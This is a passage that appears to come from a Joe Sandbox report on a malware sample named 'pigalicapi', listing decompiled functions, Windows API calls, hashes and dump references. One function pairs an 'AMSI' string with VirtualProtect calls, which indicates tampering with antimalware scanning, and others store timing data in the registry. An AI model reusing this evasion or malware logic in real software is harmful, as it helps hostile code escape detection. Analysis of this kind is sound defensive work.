							_pop(_t18);
							goto __eax;
						}
						 *_t22 = 8;
						 *_t12();
						goto L15;
					}
					if(_t12 == 0xc0000096) {
						L19:
						_v24 = 0;
						 *_t22 = 4;
						L0040EEF0();
						if(_t12 == 1) {
							_v24 = 1;
							 *_t22 = 4;
							L0040EEF0();
							goto L15;
						}
						if(_t12 == 0) {
							goto L9;
						}
						 *_t22 = 4;
						 *_t12();
						goto L15;
					}
					if(_t12 == 0xc0000093) {
						L17:
						_t19 = 1;
						goto L12;
					}
					goto L9;
				}
				if(_t12 >= 0xc000008d) {
					goto L17;
				}
				if(_t12 != 0xc0000005) {
					if(_t12 != 0xc000001d) {
						goto L9;
					}
					goto L19;
				}
				_v24 = 0;
				 *_t22 = 0xb;
				L0040EEF0();
				if(_t12 == 1) {
					_v24 = 1;
					 *_t22 = 0xb;
					L0040EEF0();
					goto L15;
				}
				if(_t12 == 0) {
					goto L9;
				}
				 *_t22 = 0xb;
				 *_t12();
				goto L15;
			}

APIs

signal.MSVCRT ref: 0040CC3B
signal.MSVCRT ref: 0040CC92
signal.MSVCRT ref: 0040CCDD
signal.MSVCRT ref: 0040CD05

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: d14f430031e0000c1544ae875ed3aa060c0f773e8259265079f7acada95bda59
Instruction ID: d8b5130f18038d3c219e8aaee35d86da13098021128de2a3e6af161d937793ff
Opcode Fuzzy Hash: d14f430031e0000c1544ae875ed3aa060c0f773e8259265079f7acada95bda59
Instruction Fuzzy Hash: 69217E7110C200CAF7206F65C5C436FB6A0AB45758F114E2BD989E73C1C77D8884979B

Uniqueness

Uniqueness Score: -1.00%

Function 00416590 Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7,?,?,?,?,0041586E), ref: 004165AE
InterlockedDecrement.KERNEL32 ref: 004165B9
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 004165D3
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 00416607
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 00416616

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CriticalSection$EnterLeave$DecrementInterlocked
String ID:
API String ID: 1781445796-0
Opcode ID: cf38177f454b4d407fb6abba26056f132e72fe4696bd102978adcf22e3062811
Instruction ID: f1d07c7601fc08a455496ddd5bfcc69915974a3964eaa512498397c80aedb5d4
Opcode Fuzzy Hash: cf38177f454b4d407fb6abba26056f132e72fe4696bd102978adcf22e3062811
Instruction Fuzzy Hash: 2621C7B5A042089FCB00EFB9E58849DBBF0EB48360F01852AEC98D7310E734E955CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00410A40 Relevance: 8.9, APIs: 7, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00410A9C
CloseHandle.KERNEL32 ref: 00410AD3
CloseHandle.KERNEL32 ref: 00410AE2
TlsSetValue.KERNEL32 ref: 00410B40

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CloseHandleValue
String ID:
API String ID: 492146193-0
Opcode ID: 50172de1c8ccb0a201679019f7e5b868fe7c56b5f502739187e9b9fc105b9909
Instruction ID: 807a0fc4849867346c23f955af7b1b9f8301ac30692e4abd2189dee9186e86bd
Opcode Fuzzy Hash: 50172de1c8ccb0a201679019f7e5b868fe7c56b5f502739187e9b9fc105b9909
Instruction Fuzzy Hash: 3F512BB0A04305CFDB10EFA5D58879A7BF4AF04344F01856AD8458B355E7B8E9C5CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 10002502 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(10004070,00000000), ref: 10002509
GetProcAddress.KERNEL32(00000000,10004078), ref: 10002525
VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 10002560
VirtualProtect.KERNEL32(?,00000004,?,?), ref: 10002581

Strings

AMSI, xrefs: 1000254C

Memory Dump Source

Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: AMSI
API String ID: 3300690313-3828877684
Opcode ID: aedc0c72c88739d98e6cc95382061a03d6f4a4626be1828d24e7b39d8783c48f
Instruction ID: f7beab1cd16fb010797eaf1f52ccd341b116c57276f54c1637b54f9798f26af1
Opcode Fuzzy Hash: aedc0c72c88739d98e6cc95382061a03d6f4a4626be1828d24e7b39d8783c48f
Instruction Fuzzy Hash: 1C11DAB5D05209EFEB04CF94CC98BAEBBB4FB48345F108599EA11A7344D770AA40DB55

Uniqueness

Uniqueness Score: -1.00%

Function 024E9290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E024E9290() {
				char _v8;
				_Unknown_base(*)()* _v12;

				_v8 = 0;
				_v12 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
				if(_v12 != 0) {
					_v12(GetCurrentProcess(),  &_v8);
				}
				return _v8;
			}

0x024e9296
0x024e92b4
0x024e92bb
0x024e92c8
0x024e92c8
0x024e92d1

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 024E92A7
GetProcAddress.KERNEL32(00000000), ref: 024E92AE
GetCurrentProcess.KERNEL32(00000000), ref: 024E92C1

Strings

IsWow64Process, xrefs: 024E929D
kernel32.dll, xrefs: 024E92A2

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32.dll
API String ID: 4190356694-3024904723
Opcode ID: 4e48800aaafd6dad51158b852f50abf2c7e1bf5449d8772a738782002c557a2d
Instruction ID: e98d93c4e9618d9ec930035a6c8a94b48986a2a0db25d3e97e7e348fcaaecdcf
Opcode Fuzzy Hash: 4e48800aaafd6dad51158b852f50abf2c7e1bf5449d8772a738782002c557a2d
Instruction Fuzzy Hash: C4E01A75C40308EBEF04EBF0D98DB8DBB78AB08207F604996E912A6241D7745654CB51

Uniqueness

Uniqueness Score: -1.00%

Function 024E7250 Relevance: 7.6, APIs: 5, Instructions: 113
registrytimeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E024E7250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				char* _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v40;
				int _v44;
				int _v48;
				char _v64;
				signed int _v68;
				intOrPtr* _v72;
				struct _SYSTEMTIME _v88;
				char* _t58;
				intOrPtr* _t68;
				short* _t69;
				signed int _t70;
				intOrPtr* _t91;
				void* _t97;
				void* _t100;
				intOrPtr* _t101;

				_v5 = 1;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 ||  *((intOrPtr*)(_a4 + 0x10)) == 0) {
					L12:
					return _v5;
				} else {
					_v24 = E024E16F0(_a8, _a12);
					_t58 =  *0x24f18a0; // 0x24f3b88
					_v12 = _t58;
					E024E7D20(_t58,  &_v40, 0, 0x10);
					wsprintfA( &_v40, "%u", _v24);
					_t100 = _t97 + 0x20;
					_v16 = 0x80000001;
					if(( *0x24f435a & 0x000000ff) != 0) {
						_v16 = 0x80000002;
					}
					_v20 = 0;
					if(RegOpenKeyExA(_v16, _v12, 0, 0xf003f,  &_v20) == 0) {
						_v48 = 0x10;
						_v44 = 0x10;
						if(RegQueryValueExA(_v20,  &_v40, 0, 0,  &_v64,  &_v44) == 0 && _v44 == 0x10) {
							_v72 =  &_v64;
							GetLocalTime( &_v88);
							_t91 = _v72;
							_t101 = _t100 - 0x10;
							_t68 = _t101;
							 *_t68 =  *_t91;
							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t91 + 4));
							 *((intOrPtr*)(_t68 + 8)) =  *((intOrPtr*)(_t91 + 8));
							 *((intOrPtr*)(_t68 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
							_t69 = _t101 - 0x10;
							 *_t69 = _v88.wYear;
							_t69[2] = _v88.wDayOfWeek;
							_t69[4] = _v88.wHour;
							_t69[6] = _v88.wSecond;
							_t70 = E024E9910();
							asm("cdq");
							_v68 = _t70 / 0x3c;
							if(_v68 <  *((intOrPtr*)(_a4 + 0x10))) {
								_v5 = 0;
							}
						}
						RegCloseKey(_v20);
					}
					goto L12;
				}
			}

0x024e7256
0x024e725e
0x024e73af
0x024e73b5
0x024e7285
0x024e7295
0x024e7298
0x024e729d
0x024e72a8
0x024e72bd
0x024e72c3
0x024e72c6
0x024e72d6
0x024e72d8
0x024e72d8
0x024e72df
0x024e7301
0x024e7307
0x024e730e
0x024e7331
0x024e733c
0x024e7343
0x024e7349
0x024e734c
0x024e734f
0x024e7353
0x024e7358
0x024e735e
0x024e7364
0x024e736a
0x024e736f
0x024e7374
0x024e737a
0x024e7380
0x024e7383
0x024e738b
0x024e7393
0x024e739f
0x024e73a1
0x024e73a1
0x024e739f
0x024e73a9
0x024e73a9
0x00000000
0x024e7301

APIs

wsprintfA.USER32 ref: 024E72BD
RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 024E72F9
RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 024E7329
GetLocalTime.KERNEL32(?), ref: 024E7343
RegCloseKey.ADVAPI32(00000000), ref: 024E73A9

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: CloseLocalOpenQueryTimeValuewsprintf
String ID:
API String ID: 3852505512-0
Opcode ID: 81820a8aeddebea06b9867b2c9c0b0d6b51a3446fdd2c1e1d8d5dd4756d99e6b
Instruction ID: 7d06f40cc225e53b3b4b26b2beee061e5ed6bd387d80a8081886905dbecdfbdb
Opcode Fuzzy Hash: 81820a8aeddebea06b9867b2c9c0b0d6b51a3446fdd2c1e1d8d5dd4756d99e6b
Instruction Fuzzy Hash: 90415BB4A40208DFEF08DF94D485BAEBBB5BF48301F14865EE915AB381D7759944CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00410C89 Relevance: 7.6, APIs: 5, Instructions: 106threadCOMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32 ref: 00410CEE
GetCurrentThreadId.KERNEL32 ref: 00410CF7
_setjmp3.MSVCRT ref: 00410D1F
CloseHandle.KERNEL32 ref: 00410D97
_endthreadex.MSVCRT(00000000,00000000), ref: 00410E04

Part of subcall function 00410280: fprintf.MSVCRT ref: 004102C0

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CloseCurrentHandleThreadValue_endthreadex_setjmp3fprintf
String ID:
API String ID: 2387900098-0
Opcode ID: afb67a9da1f32ea5b8055769f7c37646c4bbc43da5d0144652c704a0bd7a2f59
Instruction ID: 13198fc10ca4ea6836e7e92751527e6844c2fb09f0a62ae1e1a6dff033c7f563
Opcode Fuzzy Hash: afb67a9da1f32ea5b8055769f7c37646c4bbc43da5d0144652c704a0bd7a2f59
Instruction Fuzzy Hash: D941F9747047059FCB10EF66D588A9A7BF4AF04344F45886DE8889B312D778E9C1CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 024E73C0 Relevance: 7.6, APIs: 5, Instructions: 70
registrytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E73C0(long _a4, intOrPtr _a8, intOrPtr _a12) {
				char* _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v36;
				char _v52;
				long _t24;
				char* _t26;

				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
					_t24 = _a4;
					if( *((intOrPtr*)(_t24 + 0x10)) != 0) {
						_v20 = E024E16F0(_a8, _a12);
						_t26 =  *0x24f18a0; // 0x24f3b88
						_v8 = _t26;
						E024E7D20(_t26,  &_v36, 0, 0x10);
						wsprintfA( &_v36, "%u", _v20);
						_v12 = 0x80000001;
						if(( *0x24f435a & 0x000000ff) != 0) {
							_v12 = 0x80000002;
						}
						_v16 = 0;
						_t24 = RegOpenKeyExA(_v12, _v8, 0, 0xf003f,  &_v16);
						if(_t24 == 0) {
							GetLocalTime( &_v52);
							RegSetValueExA(_v16,  &_v36, 0, 3,  &_v52, 0x10);
							return RegCloseKey(_v16);
						}
					}
				}
				return _t24;
			}

0x024e73ca
0x024e73e4
0x024e73eb
0x024e7401
0x024e7404
0x024e7409
0x024e7414
0x024e7429
0x024e7432
0x024e7442
0x024e7444
0x024e7444
0x024e744b
0x024e7465
0x024e746d
0x024e7473
0x024e748b
0x00000000
0x024e7495
0x024e746d
0x024e73eb
0x024e749e

APIs

wsprintfA.USER32 ref: 024E7429
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 024E7465
GetLocalTime.KERNEL32(?), ref: 024E7473
RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 024E748B
RegCloseKey.ADVAPI32(00000000), ref: 024E7495

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: CloseLocalOpenTimeValuewsprintf
String ID:
API String ID: 3926099652-0
Opcode ID: d8534e6eb5cc7fff0b6601eb1e473bf811b82b4f0ca3e298a246cee83af307fd
Instruction ID: a76e5e689cddf47266a2a3cb71896f0a8fd01422a61496d92d3a095c5f0a957e
Opcode Fuzzy Hash: d8534e6eb5cc7fff0b6601eb1e473bf811b82b4f0ca3e298a246cee83af307fd
Instruction Fuzzy Hash: 65216B75D40208ABEF04CFA4D888FAEBB78BF48705F048949FA059A281D7B49610CB50

Uniqueness

Uniqueness Score: -1.00%

Function 024E9650 Relevance: 7.6, APIs: 5, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E9650(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16) {
				int _v8;
				intOrPtr _v12;
				char _v20;
				int _v24;
				signed char _v25;
				void* _t58;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
					_v12 = 0;
					_v24 = lstrlenA(_a12);
					while(_v12 < _a8 && _v24 < _a16) {
						_v25 =  *((intOrPtr*)(_a4 + _v12));
						E024E7D20(_a4 + _v12,  &_v20, 0, 8);
						E024E9560(_v25 & 0x000000ff,  &_v20, 7);
						_t58 = _t58 + 0x18;
						lstrcatA(_a12,  &_v20);
						_v24 = lstrlenA(_a12);
						_v12 = _v12 + 1;
					}
					if(lstrlenA(_a12) > _a16) {
						_a12[_a16] = 0;
					}
					_v8 = lstrlenA(_a12);
				}
				return _v8;
			}

0x024e9656
0x024e9661
0x024e9685
0x024e9696
0x024e9699
0x024e96b1
0x024e96bc
0x024e96cf
0x024e96d4
0x024e96df
0x024e96ef
0x024e96f8
0x024e96f8
0x024e970a
0x024e9712
0x024e9712
0x024e971f
0x024e971f
0x024e9728

APIs

lstrlenA.KERNEL32(00000000), ref: 024E9690
lstrcatA.KERNEL32(00000000,00000000), ref: 024E96DF
lstrlenA.KERNEL32(00000000), ref: 024E96E9
lstrlenA.KERNEL32(00000000), ref: 024E9701
lstrlenA.KERNEL32(00000000), ref: 024E9719

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID:
API String ID: 493641738-0
Opcode ID: 5110b091d19af6d3d200401d4df2741a6251172f42651b92de77bef5c2aec830
Instruction ID: cb04ab1e6b9d95b01a4b97ecdc7c487bce646bf604fb00dd91d294b557c14562
Opcode Fuzzy Hash: 5110b091d19af6d3d200401d4df2741a6251172f42651b92de77bef5c2aec830
Instruction Fuzzy Hash: 56212AB0900349EFEF18CFA4D885BAE7BB5BF44305F14894AE915A7381D374AA54CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0040D450 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0040D488
GetCurrentProcessId.KERNEL32 ref: 0040D499
GetCurrentThreadId.KERNEL32 ref: 0040D4A1
GetTickCount.KERNEL32 ref: 0040D4AA
QueryPerformanceCounter.KERNEL32 ref: 0040D4B9

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: d5a97a9b8559dd39cafb010e2e76c8d29c3b64d6af4c216edf4aba10e025f6e2
Instruction ID: f7418f5e27814e582490d40679fb3d8e681102d975b17fa56a29dd6ac314bc8c
Opcode Fuzzy Hash: d5a97a9b8559dd39cafb010e2e76c8d29c3b64d6af4c216edf4aba10e025f6e2
Instruction Fuzzy Hash: 1711B27AD002188BCB109FB9E9885DEFBB4FB4C364F854536D805B7210DB3569198B99

Uniqueness

Uniqueness Score: -1.00%

Function 00416290 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 210
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00416290(void* __ecx, void* __edx, char _a4, intOrPtr _a8, signed int _a12) {
				void* _v16;
				intOrPtr _v32;
				char _v36;
				signed int _v48;
				signed int _v52;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t51;
				intOrPtr _t53;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				void* _t78;
				signed int _t79;
				signed int _t80;
				void* _t82;
				signed int _t83;
				void* _t85;
				signed int _t86;
				char _t87;
				void* _t88;
				void* _t89;
				intOrPtr* _t90;
				intOrPtr* _t91;
				intOrPtr* _t99;
				void* _t103;

				_t82 = __edx;
				_t78 = __ecx;
				_t90 = _t89 - 0x3c;
				_t87 = _a4;
				_t101 = _a8 - 1;
				_t75 = _a12;
				if(_a8 == 1) {
					_v72 = _t75;
					 *_t90 = _t87;
					_v48 = WaitForSingleObject;
					_t46 = WaitForSingleObject(??, ??);
					_t91 = _t90 - 8;
					__eflags = WaitForSingleObject - 0x80;
					if(WaitForSingleObject == 0x80) {
						_t76 = 1;
						goto L19;
					} else {
						__eflags = WaitForSingleObject - 0x102;
						if(WaitForSingleObject == 0x102) {
							_t76 = 0x8a;
							goto L19;
						} else {
							__eflags = WaitForSingleObject - 1;
							asm("sbb eax, eax");
							_t51 =  !_t46 & 0x00000016;
							__eflags = WaitForSingleObject;
							goto L15;
						}
					}
				} else {
					_v36 = _t87;
					 *_t90 = E00411DD0();
					_t53 = E00411DF0(_t101);
					_v32 = _t53;
					if(_t53 == 0) {
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							_v48 = WaitForSingleObject;
							while(1) {
								_v72 = 0x28;
								 *_t90 = _t87;
								_t55 = _v48();
								_t91 = _t90 - 8;
								__eflags = _t55 - 0x80;
								_t83 = _t55;
								if(_t55 == 0x80) {
									break;
								}
								__eflags = _t55 - 0x102;
								if(_t55 == 0x102) {
									_t59 = E00412070(_t75, _t78, _t83, _t85, _t87, _t88);
									__eflags = _t59;
									if(_t59 == 0) {
										continue;
									} else {
										goto L49;
									}
								} else {
									_t51 = 0;
									__eflags = _t83;
									_t76 = 0x16;
									if(_t83 == 0) {
										goto L15;
									} else {
										L55:
										_t56 = E00412070(_t76, _t78, _t83, _t85, _t87, _t88);
										__eflags = _t56;
										if(_t56 != 0) {
											L49:
											__eflags = _a8 - 2;
											if(_a8 == 2) {
												goto L17;
											} else {
												goto L50;
											}
										} else {
											__eflags = _t76 - 0x16;
											_t51 = 0x16;
											if(_t76 != 0x16) {
												L19:
												_v80 = 0;
												 *_t91 = _t87;
												_t47 = _v48();
												__eflags = _t47;
												if(_t47 != 0) {
													goto L10;
												} else {
													goto L20;
												}
											} else {
												goto L15;
											}
										}
									}
								}
								goto L59;
							}
							_t76 = 1;
							goto L55;
						} else {
							_t86 = 0x14;
							_v48 = WaitForSingleObject;
							do {
								__eflags = _t86 - _t75;
								_t86 =  >  ? _t75 : _t86;
								_v72 = _t86;
								 *_t90 = _t87;
								_t61 = _v48();
								_t90 = _t90 - 8;
								__eflags = _t61 - 0x80;
								if(_t61 == 0x80) {
									_t79 = 1;
									goto L30;
								} else {
									__eflags = _t61 - 0x102;
									if(_t61 == 0x102) {
										_t79 = 0x8a;
										goto L30;
									} else {
										__eflags = _t61;
										if(_t61 == 0) {
											_t79 = 0;
											__eflags = 0;
											goto L40;
										} else {
											_t79 = 0x16;
											L30:
											_t75 = _t75 - _t86;
											__eflags = _t75;
											if(_t75 != 0) {
												_v52 = _t79;
												_t62 = E00412070(_t75, _t79, _t82, _t86, _t87, _t88);
												_t80 = _v52;
												__eflags = _t62;
												if(_t62 != 0) {
													goto L17;
												} else {
													goto L37;
												}
											} else {
												L31:
												__eflags = _t79 - 0x8a;
												if(_t79 != 0x8a) {
													L40:
													__eflags = _t79;
													if(_t79 != 0) {
														goto L33;
													} else {
														_t64 = _t79;
														goto L35;
													}
												} else {
													_v52 = _t79;
													_v80 = 0;
													 *_t90 = _t87;
													_t65 = _v48();
													_t79 = _v52;
													__eflags = _t65;
													if(_t65 == 0) {
														goto L20;
													} else {
														L33:
														__eflags = _a8 - 2;
														if(_a8 != 2) {
															_v48 = _t79;
															E00412210();
															_t51 = _v48;
															goto L15;
														} else {
															_t64 = _t79;
															L35:
															return _t64;
														}
													}
												}
											}
										}
									}
								}
								goto L59;
								L37:
								__eflags = _t80 - 0x8a;
							} while (_t80 == 0x8a);
							goto L31;
						}
					} else {
						while(1) {
							_v64 = _t75;
							_v68 = 0;
							_v72 =  &_v36;
							 *_t90 = 2;
							_t67 = WaitForMultipleObjects(??, ??, ??, ??);
							_t99 = _t90 - 0x10;
							_t103 = _t67 - 1;
							if(_t103 != 0) {
								break;
							}
							 *_t99 = _v32;
							ResetEvent(??);
							_t90 = _t99 - 4;
							__eflags = _a8 - 2;
							if(_a8 != 2) {
								L50:
								E00412210();
								_t51 = 0x16;
								L15:
								return _t51;
							} else {
								E00412210();
								continue;
							}
							goto L59;
						}
						if(_t103 < 0) {
							_t48 = 0;
							goto L11;
						} else {
							if(_t67 == 0x80) {
								_t76 = 1;
								goto L7;
							} else {
								if(_t67 != 0x102) {
									__eflags = _a8 - 2;
									_t76 = 0x16;
									_t73 = _t67 & 0xffffff00 | _a8 != 0x00000002;
									goto L9;
								} else {
									_t76 = 0x8a;
									L7:
									_v72 = 0;
